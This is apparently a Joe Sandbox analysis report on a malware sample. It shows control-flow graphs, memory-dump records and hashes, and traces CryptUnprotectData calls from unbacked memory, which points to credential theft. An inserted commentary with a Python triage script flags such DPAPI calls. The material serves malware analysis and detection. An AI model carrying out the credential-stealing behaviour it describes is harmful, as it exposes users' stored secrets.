calls 41149->41150 41151 38a1402b 41150->41151 41153 38a14036 41151->41153 41160 38a12bec 41151->41160 41153->41127 41158 38a13ffd 41154->41158 41155 38a10938 10 API calls 41156 38a1402b 41155->41156 41157 38a14036 41156->41157 41159 38a12bec 13 API calls 41156->41159 41157->41127 41158->41155 41159->41157 41161 38a12bf7 41160->41161 41163 38a140a8 41161->41163 41164 38a12c20 41161->41164 41163->41163 41165 38a12c2b 41164->41165 41177 38a12c30 41165->41177 41167 38a14517 41185 38a140f8 41167->41185 41169 38a14540 41170 38a14108 3 API calls 41169->41170 41171 38a14547 41170->41171 41174 38a18400 3 API calls 41171->41174 41190 38a19067 41171->41190 41201 38a191f0 41171->41201 41208 38a191d8 41171->41208 41172 38a14551 41172->41163 41174->41172 41178 38a12c3b 41177->41178 41183 38a16c00 3 API calls 41178->41183 41216 38a16c70 41178->41216 41221 38a16bf0 41178->41221 41179 38a157a0 41179->41167 41180 38a13e40 13 API calls 41180->41179 41181 38a15728 41181->41179 41181->41180 41183->41181 41188 38a14103 41185->41188 41187 38a189d3 41187->41169 41189 38a189d8 41188->41189 41225 38a18308 41188->41225 41189->41169 41191 38a19076 41190->41191 41192 38a191c8 41191->41192 41193 38a16e88 3 API calls 41191->41193 41192->41172 41195 38a1910f 41193->41195 41194 38a18400 3 API calls 41194->41195 41195->41194 41197 38a191ea 41195->41197 41196 38a1922d 41196->41172 41197->41196 41198 384efa68 3 API calls 41197->41198 41199 384efab0 3 API calls 41197->41199 41200 384efaa1 3 API calls 41197->41200 41198->41196 41199->41196 41200->41196 41203 38a19221 41201->41203 41204 38a19321 41201->41204 41202 38a1922d 41202->41172 41203->41202 41205 384efa68 3 API calls 41203->41205 41206 384efab0 3 API calls 41203->41206 41207 384efaa1 3 API calls 41203->41207 41204->41172 41205->41204 41206->41204 41207->41204 41209 38a191ea 41208->41209 41210 38a1915d 41208->41210 41211 38a1922d 41209->41211 41213 384efa68 3 API calls 41209->41213 41214 384efab0 3 API calls 41209->41214 41215 384efaa1 3 API 
calls 41209->41215 41210->41208 41212 38a18400 3 API calls 41210->41212 41211->41172 41212->41210 41213->41211 41214->41211 41215->41211 41217 38a16c0b 41216->41217 41219 38a16c7a 41216->41219 41220 38a16db8 3 API calls 41217->41220 41218 38a16c3e 41218->41181 41219->41181 41220->41218 41222 38a16c0a 41221->41222 41224 38a16db8 3 API calls 41222->41224 41223 38a16c3e 41223->41181 41224->41223 41227 38a18313 41225->41227 41226 38a18b55 41226->41187 41227->41226 41228 38a14108 3 API calls 41227->41228 41228->41226 41230 38a1c54f 41229->41230 41231 38a1d3bb 41230->41231 41233 38a1c560 41230->41233 41231->41131 41234 38a1d3f0 OleInitialize 41233->41234 41235 38a1d454 41234->41235 41235->41231 41237 38a1e6d0 DispatchMessageW 41236->41237 41238 38a1e73c 41237->41238 41238->41138 41239 384ece60 41240 384ece7c 41239->41240 41243 384e94b4 41240->41243 41242 384ece9b 41244 384e94bf 41243->41244 41245 384ecf4f 41244->41245 41248 384ecf68 41244->41248 41252 384ecf59 41244->41252 41245->41242 41250 384ecf7f 41248->41250 41249 384ed021 41250->41249 41251 384e95e8 3 API calls 41250->41251 41251->41249 41254 384ecf67 41252->41254 41253 384ed021 41253->41253 41254->41253 41255 384e95e8 3 API calls 41254->41255 41255->41253
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: hKy5Ky5
                                                                                                            • API String ID: 0-2049275150
                                                                                                            • Opcode ID: 0e8c426d9457f177031a80c56b2e23326f4e15585ed41e09ac45335ac873d2e8
                                                                                                            • Instruction ID: d750a9cf61b61e97a8a513c21504dbe3140bddabd8a86e3bc9b1ddea64d693db
                                                                                                            • Opcode Fuzzy Hash: 0e8c426d9457f177031a80c56b2e23326f4e15585ed41e09ac45335ac873d2e8
                                                                                                            • Instruction Fuzzy Hash: 47A27F70A04209DFCB15CF68C994AAEBBB2FF88311F158569E825DF261D730ED49CB61

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1554 1560e0-156103 1555 156105-15610b 1554->1555 1556 15610e-15612e 1554->1556 1555->1556 1559 156135-15613c 1556->1559 1560 156130 1556->1560 1562 15613e-156149 1559->1562 1561 1564c4-1564cd 1560->1561 1563 1564d5-1564fb 1562->1563 1564 15614f-156162 1562->1564 1567 156164-156172 1564->1567 1568 156178-156193 1564->1568 1567->1568 1573 15644c-156453 1567->1573 1571 156195-15619b 1568->1571 1572 1561b7-1561ba 1568->1572 1574 1561a4-1561a7 1571->1574 1575 15619d 1571->1575 1577 156314-15631a 1572->1577 1578 1561c0-1561c3 1572->1578 1573->1561 1576 156455-156457 1573->1576 1580 1561da-1561e0 1574->1580 1581 1561a9-1561ac 1574->1581 1575->1574 1575->1577 1579 156406-156409 1575->1579 1575->1580 1582 156466-15646c 1576->1582 1583 156459-15645e 1576->1583 1577->1579 1584 156320-156325 1577->1584 1578->1577 1585 1561c9-1561cf 1578->1585 1590 1564d0 1579->1590 1591 15640f-156415 1579->1591 1592 1561e6-1561e8 1580->1592 1593 1561e2-1561e4 1580->1593 1586 156246-15624c 1581->1586 1587 1561b2 1581->1587 1582->1563 1588 15646e-156473 1582->1588 1583->1582 1584->1579 1585->1577 1589 1561d5 1585->1589 1586->1579 1596 156252-156258 1586->1596 1587->1579 1594 156475-15647a 1588->1594 1595 1564b8-1564bb 1588->1595 1589->1579 1590->1563 1597 156417-15641f 1591->1597 1598 15643a-15643e 1591->1598 1599 1561f2-1561fb 1592->1599 1593->1599 1594->1590 1604 15647c 1594->1604 1595->1590 1603 1564bd-1564c2 1595->1603 1605 15625e-156260 1596->1605 1606 15625a-15625c 1596->1606 1597->1563 1607 156425-156434 1597->1607 1598->1573 1602 156440-156446 1598->1602 1600 1561fd-156208 1599->1600 1601 15620e-156236 1599->1601 1600->1579 1600->1601 1627 15623c-156241 1601->1627 1628 15632a-156360 1601->1628 1602->1562 1602->1573 1603->1561 1603->1576 1608 156483-156488 1604->1608 1609 15626a-156281 1605->1609 1606->1609 1607->1568 1607->1598 1613 1564aa-1564ac 1608->1613 1614 
15648a-15648c 1608->1614 1620 156283-15629c 1609->1620 1621 1562ac-1562d3 1609->1621 1613->1590 1616 1564ae-1564b1 1613->1616 1617 15648e-156493 1614->1617 1618 15649b-1564a1 1614->1618 1616->1595 1617->1618 1618->1563 1619 1564a3-1564a8 1618->1619 1619->1613 1623 15647e-156481 1619->1623 1620->1628 1631 1562a2-1562a7 1620->1631 1621->1590 1633 1562d9-1562dc 1621->1633 1623->1590 1623->1608 1627->1628 1634 156362-156366 1628->1634 1635 15636d-156375 1628->1635 1631->1628 1633->1590 1636 1562e2-15630b 1633->1636 1637 156385-156389 1634->1637 1638 156368-15636b 1634->1638 1635->1590 1639 15637b-156380 1635->1639 1636->1628 1651 15630d-156312 1636->1651 1641 1563a8-1563ac 1637->1641 1642 15638b-156391 1637->1642 1638->1635 1638->1637 1639->1579 1644 1563b6-1563d5 call 1566b8 1641->1644 1645 1563ae-1563b4 1641->1645 1642->1641 1643 156393-15639b 1642->1643 1643->1590 1647 1563a1-1563a6 1643->1647 1648 1563db-1563df 1644->1648 1645->1644 1645->1648 1647->1579 1648->1579 1649 1563e1-1563fd 1648->1649 1649->1579 1651->1628
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ny5$Oy5xOy5
                                                                                                            • API String ID: 0-4294424330
                                                                                                            • Opcode ID: 8ab0ef47273be179d8cac9bf292b7dc1d30316aac240fdd3fbfdb22d7f201b15
                                                                                                            • Instruction ID: a6959c8b307ed689a8777cb54a22e027f8b92e0efd651ce94d4a39a97a866fd3
                                                                                                            • Opcode Fuzzy Hash: 8ab0ef47273be179d8cac9bf292b7dc1d30316aac240fdd3fbfdb22d7f201b15
                                                                                                            • Instruction Fuzzy Hash: 6AD14F30A00119DFCB54CFA9C984AADBBB2FF98316F958165E825AF261DB30DD45CB90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1678 378ad9d9-378ad9de 1679 378ad9e0-378ada52 CryptUnprotectData 1678->1679 1680 378ada5b-378ada83 1679->1680 1681 378ada54-378ada5a 1679->1681 1681->1680
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(0000004D,?,00000000,?,?,?,?), ref: 378ADA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: 69e1778c625ee661c113edae90ceae9c9847972653d0095b2d5e985897c447b9
                                                                                                            • Instruction ID: bf09eb0fcb61f46bf260f7629b591d7578ffa43767eb005de1e659ee38617999
                                                                                                            • Opcode Fuzzy Hash: 69e1778c625ee661c113edae90ceae9c9847972653d0095b2d5e985897c447b9
                                                                                                            • Instruction Fuzzy Hash: 7D1167B2800249DFCF10CF9AC844BDEBBF4EF48320F14842AE958A7211C339A590CFA5

                                                                                                             Control-flow Graph (rendered as an image; basic blocks and edges recovered from the graph data)
                                                                                                             • Block 1684: 378ad1ec-378ada52 (calls CryptUnprotectData)
                                                                                                             • Block 1686: 378ada5b-378ada83
                                                                                                             • Block 1687: 378ada54-378ada5a
                                                                                                             • Edges: 1684->1686, 1684->1687, 1687->1686
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(0000004D,?,00000000,?,?,?,?), ref: 378ADA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: 27ba8ebbfd8ba184dc208e4e9d8fb97a6c074871e2cd5707db42a5debe7dc82e
                                                                                                            • Instruction ID: 46718abb8d211c04b5538c4fc344de3733f08a46a2563bbec2be4adc05bd4538
                                                                                                            • Opcode Fuzzy Hash: 27ba8ebbfd8ba184dc208e4e9d8fb97a6c074871e2cd5707db42a5debe7dc82e
                                                                                                            • Instruction Fuzzy Hash: 881159B2800349EFDB10CF9AC405BEEBBF4EB48320F148429E554A7211C775A554CFA5
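The two records above both resolve to the same CryptUnprotectData call site (ref 378ADA45) inside a dump region that is "based on PE: false", i.e. executable memory with no backing image. DPAPI use from such a region is what injected credential-stealing code looks like, and it is the first thing worth pulling out of a report of this size. The following is an added example, not part of the Joe Sandbox report or of the sample: a small triage script that parses the per-function record layout shown on this page (APIs / Memory Dump Source / Similarity), flags DPAPI calls from unbacked memory, and groups records by call-site address so that overlapping function fingerprints of one call site are visible. The input is constructed from the records on this page, trimmed to the lines the parser reads; the record layout and the "based on PE" heuristic are assumptions about the report format, not a documented Joe Sandbox API.

```python
"""Triage helper for the per-function records in a Joe Sandbox report.

Added example, not the report's or the sample's own code. It assumes the
record layout visible on this page: an optional "APIs" list, a "Memory Dump
Source" line, and a "Similarity" block that ends with "Instruction Fuzzy Hash".
"""
import re
from dataclasses import dataclass, field

# Constructed input: three records copied from this page, trimmed to the
# lines the parser reads. Two call CryptUnprotectData, one does not.
SAMPLE = """\
APIs
• CryptUnprotectData.CRYPT32(0000004D,?,00000000,?,?,?,?), ref: 378ADA45
Memory Dump Source
• Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
Similarity
• API ID: CryptDataUnprotect
• String ID:
• Opcode ID: 69e1778c625ee661c113edae90ceae9c9847972653d0095b2d5e985897c447b9
• Instruction Fuzzy Hash: 7D1167B2800249DFCF10CF9AC844BDEBBF4EF48320F14842AE958A7211C339A590CFA5
APIs
• CryptUnprotectData.CRYPT32(0000004D,?,00000000,?,?,?,?), ref: 378ADA45
Memory Dump Source
• Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
Similarity
• API ID: CryptDataUnprotect
• String ID:
• Opcode ID: 27ba8ebbfd8ba184dc208e4e9d8fb97a6c074871e2cd5707db42a5debe7dc82e
• Instruction Fuzzy Hash: 881159B2800349EFDB10CF9AC405BEEBBF4EB48320F148429E554A7211C775A554CFA5
Strings
Memory Dump Source
• Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
Similarity
• API ID:
• String ID: s5
• Opcode ID: 963a2e8b165512567a2a999b26de567d3c7d9364985dd5e3c816f7df88852664
• Instruction Fuzzy Hash: 7EA11674D00208CFEB14DFA4C988BDDBBB1BF89311F208269E448BB291DB75A985CF55
"""

API_RE = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
FIELD_RE = re.compile(r"^• (API ID|String ID|Opcode ID|Instruction Fuzzy Hash): ?(.*)$")

# DPAPI entry points; any of them from unbacked memory is worth a look.
DPAPI_APIS = {"CryptUnprotectData", "CryptProtectData"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int  # call-site address from the "ref:" field


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    fields: dict = field(default_factory=dict)


def parse_records(text):
    """Split the report text into FunctionRecord objects, one per fingerprint."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if m := API_RE.match(line):
            cur.apis.append(ApiCall(m[1], m[2], m[3].split(","), int(m[4], 16)))
        elif m := SRC_RE.match(line):
            cur.source_file, cur.offset = m[1], int(m[2], 16)
            cur.based_on_pe = m[3] == "true"
        elif m := FIELD_RE.match(line):
            cur.fields[m[1]] = m[2]
            if m[1] == "Instruction Fuzzy Hash":  # last line of every record
                records.append(cur)
                cur = FunctionRecord()
    return records


def dpapi_from_unbacked_memory(records):
    """Records that call a DPAPI function from a dump region not backed by a PE image."""
    return [r for r in records
            if not r.based_on_pe and any(a.name in DPAPI_APIS for a in r.apis)]


def group_by_call_site(records):
    """Map (API name, call-site address) to the Opcode IDs of the records containing it."""
    sites = {}
    for r in records:
        for a in r.apis:
            sites.setdefault((a.name, a.ref), []).append(r.fields.get("Opcode ID", ""))
    return sites


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in dpapi_from_unbacked_memory(recs):
        print(f"DPAPI from unbacked region at {r.offset:08X}: "
              f"opcode {r.fields['Opcode ID'][:16]}...")
    for (name, ref), ids in group_by_call_site(recs).items():
        print(f"{name} call site {ref:08X} is covered by {len(ids)} function record(s)")
```

Grouping by the "ref:" address is what exposes that the two CryptUnprotectData records are not two callers but two overlapping function starts (378ad9d9 and 378ad1ec) that both reach the single call at 378ADA45; when pivoting on the Opcode ID or fuzzy hash across reports, treat them as one call site.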
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: s5
                                                                                                            • API String ID: 0-1057577681
                                                                                                            • Opcode ID: 963a2e8b165512567a2a999b26de567d3c7d9364985dd5e3c816f7df88852664
                                                                                                            • Instruction ID: 1e1f9c83326d84d15a6be35900643bd0b76eabfcef9b150821012ae8347ea2b3
                                                                                                            • Opcode Fuzzy Hash: 963a2e8b165512567a2a999b26de567d3c7d9364985dd5e3c816f7df88852664
                                                                                                            • Instruction Fuzzy Hash: 7EA11674D00208CFEB14DFA4C988BDDBBB1BF89311F208269E448BB291DB75A985CF55
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: s5
                                                                                                            • API String ID: 0-1057577681
                                                                                                            • Opcode ID: 81f8081236876a2b75202bf6056dfe09e436958ae6df0a952d71be52f4ba03f1
                                                                                                            • Instruction ID: 1b54e329bbf4e6829f7ce6930175e06863c1977dcbef04fde250f6c447506df0
                                                                                                            • Opcode Fuzzy Hash: 81f8081236876a2b75202bf6056dfe09e436958ae6df0a952d71be52f4ba03f1
                                                                                                            • Instruction Fuzzy Hash: 07A11570D00208CFEB14DFA9C988BDDBBB1BF89311F208269E418BB291DB759985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 730533ebe386401bab3609200cdda5edcf35000a3262cdb8e9bd6c83ce3c642e
                                                                                                            • Instruction ID: c11194f3224096f742edd94aaada1b9463ea7fbd1f9be187e2b75f821f6e7212
                                                                                                            • Opcode Fuzzy Hash: 730533ebe386401bab3609200cdda5edcf35000a3262cdb8e9bd6c83ce3c642e
                                                                                                            • Instruction Fuzzy Hash: 1082C274A00229CFDB25DF65C894BA9B7B2FB89300F5081E9D90AB7351DB319E82DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c536e044520419ad2ebe21999809e3d8a7672cd2890ee5aba7f8581f2a86ef2c
                                                                                                            • Instruction ID: 34346a6d3bb89cf048d02f0455ccb441773f5d562ba9f4d2a98a7169d51d4f3a
                                                                                                            • Opcode Fuzzy Hash: c536e044520419ad2ebe21999809e3d8a7672cd2890ee5aba7f8581f2a86ef2c
                                                                                                            • Instruction Fuzzy Hash: 7272D274A01218CFDB25DF65C994BA9B7B2FB89301F5081E9D909B7361CB319E82DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d908e187c43445842c745d5f53f391b55d205b22b8666940020daf47611aa798
                                                                                                            • Instruction ID: ce3868f7eba1afe9c0609d53d5b06ad61659f56a843ff50a8422b258062ea8f5
                                                                                                            • Opcode Fuzzy Hash: d908e187c43445842c745d5f53f391b55d205b22b8666940020daf47611aa798
                                                                                                            • Instruction Fuzzy Hash: 2D72A274E01229CFEB64DF69C984BD9BBB2BB49301F5481E9D448A7351DB34AE81CF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e3da87ab261c56ae1e3fd5ed7cdfd360c8ae33c3c8ccd70891ec36c744609f4d
                                                                                                            • Instruction ID: eff4a302c5d7b40cfd36add722824fe3e3b7dd04ba04c9d9e43849fe7e5ff3e0
                                                                                                            • Opcode Fuzzy Hash: e3da87ab261c56ae1e3fd5ed7cdfd360c8ae33c3c8ccd70891ec36c744609f4d
                                                                                                            • Instruction Fuzzy Hash: E8126C30A00208DFCB14CF69D994AAEBBF2FF48315F558559E865EB261DB30ED45CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8d9b34a59caa1c71481a4cc895e9e274ed6c3981fecda782bcc1b8d4ee669d5d
                                                                                                            • Instruction ID: 3d642a2510bce0ddfad9f7ff5de88f392225ea24014fb2fd20f6126c17a3450e
                                                                                                            • Opcode Fuzzy Hash: 8d9b34a59caa1c71481a4cc895e9e274ed6c3981fecda782bcc1b8d4ee669d5d
                                                                                                            • Instruction Fuzzy Hash: 61E1F074E01218CFEB64CFA9C994B9DBBB2BF89300F2081A9D419B7391DB355A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6d81b503c8a97446f2633a7606aeff0950de26e53d4c83e54463ff6e321ec16b
                                                                                                            • Instruction ID: 3a514471735f18697b0fe1e9329bda93832017a65c596cfbe01fd5cf2269f521
                                                                                                            • Opcode Fuzzy Hash: 6d81b503c8a97446f2633a7606aeff0950de26e53d4c83e54463ff6e321ec16b
                                                                                                            • Instruction Fuzzy Hash: 71C1CE74E00318CFDB54DFA5C994B9DBBB2AF89300F5080A9D819AB355DB359E85CF10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1e4cb0c8654eaaf44c6ee101439f4930a59932b48047ef29ccd5d1b28a715d5a
                                                                                                            • Instruction ID: fc3b523d878c0d6ded2be809b68f12d550e80d81d6ab203acc78e5edfc575baf
                                                                                                            • Opcode Fuzzy Hash: 1e4cb0c8654eaaf44c6ee101439f4930a59932b48047ef29ccd5d1b28a715d5a
                                                                                                            • Instruction Fuzzy Hash: 33C1AE74E00318CFEB54DFA5C994BADBBB2BB88301F5080A9D809AB355EB355E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 86f1f806fc2574095b8ef2bd0baa66068bc0b1751862cf7f700c21adefc47364
                                                                                                            • Instruction ID: 3a28ca8e3f53496e8720d7db847370ecb688b0e21004d77a878d367958b561a1
                                                                                                            • Opcode Fuzzy Hash: 86f1f806fc2574095b8ef2bd0baa66068bc0b1751862cf7f700c21adefc47364
                                                                                                            • Instruction Fuzzy Hash: AFA19CB0D0A388CFEB29CFB5C9906CDBBF2AF49301F5884AAD454BB755D6305886CB51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d620d615fc6b99bf9bea3749d529acd02338ecf284c5cfa992cbed23dcda4e54
                                                                                                            • Instruction ID: 121f1739f007b5f657ea9ac7851edb5fae212aa50977cd1bc2d0758510e3bcfd
                                                                                                            • Opcode Fuzzy Hash: d620d615fc6b99bf9bea3749d529acd02338ecf284c5cfa992cbed23dcda4e54
                                                                                                            • Instruction Fuzzy Hash: DBA171B5E01228CFEB18CF6AC944B9DFBF2AF89301F54C1AAD408A7255DB345A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0fca00c3616f978e14f813d86c204f56e9f0a3ff9aa76648650d72d324d2a85b
                                                                                                            • Instruction ID: b703dcc4df4964c52869790232b9c239d6260be9b4e1366e37905df4659d37a8
                                                                                                            • Opcode Fuzzy Hash: 0fca00c3616f978e14f813d86c204f56e9f0a3ff9aa76648650d72d324d2a85b
                                                                                                            • Instruction Fuzzy Hash: DDA183B4E01228CFEB18CF6AC944B9DBBF2BF89301F14C1AAD448A7255DB745A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 131b6b873e5f6711a938c3c13097a3897aee555d2832088ab2f9ac010aa9e9d5
                                                                                                            • Instruction ID: 7532618b906307c69fbe602534823c3b2a9c438a18f65c298935d781e83d49e1
                                                                                                            • Opcode Fuzzy Hash: 131b6b873e5f6711a938c3c13097a3897aee555d2832088ab2f9ac010aa9e9d5
                                                                                                            • Instruction Fuzzy Hash: A2A183B4E012288FEB24CF6AC944B9DBBF2BF89301F54C1AAD508B7255DB345A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 29c3370f68e3b14c8797e5265addde0629c43ec49f178f96f04ec66705c0206d
                                                                                                            • Instruction ID: ee5a348bd280b76e6f45f4729e41e9cfb5854898064c4e06f508a9a326d50706
                                                                                                            • Opcode Fuzzy Hash: 29c3370f68e3b14c8797e5265addde0629c43ec49f178f96f04ec66705c0206d
                                                                                                            • Instruction Fuzzy Hash: BCA173B5E01218CFEB68CF6AC944B9DBBF2BF89301F14C1AAD448A7255DB345A85CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 51739a36d808284afeee38d9183182e729ad38fe158191b3979caa5f5491279f
                                                                                                            • Instruction ID: ac6b9fe3d1d0846a83907203dc3f568fda95e9b3a9408d2be358dc0ea9ae7d33
                                                                                                            • Opcode Fuzzy Hash: 51739a36d808284afeee38d9183182e729ad38fe158191b3979caa5f5491279f
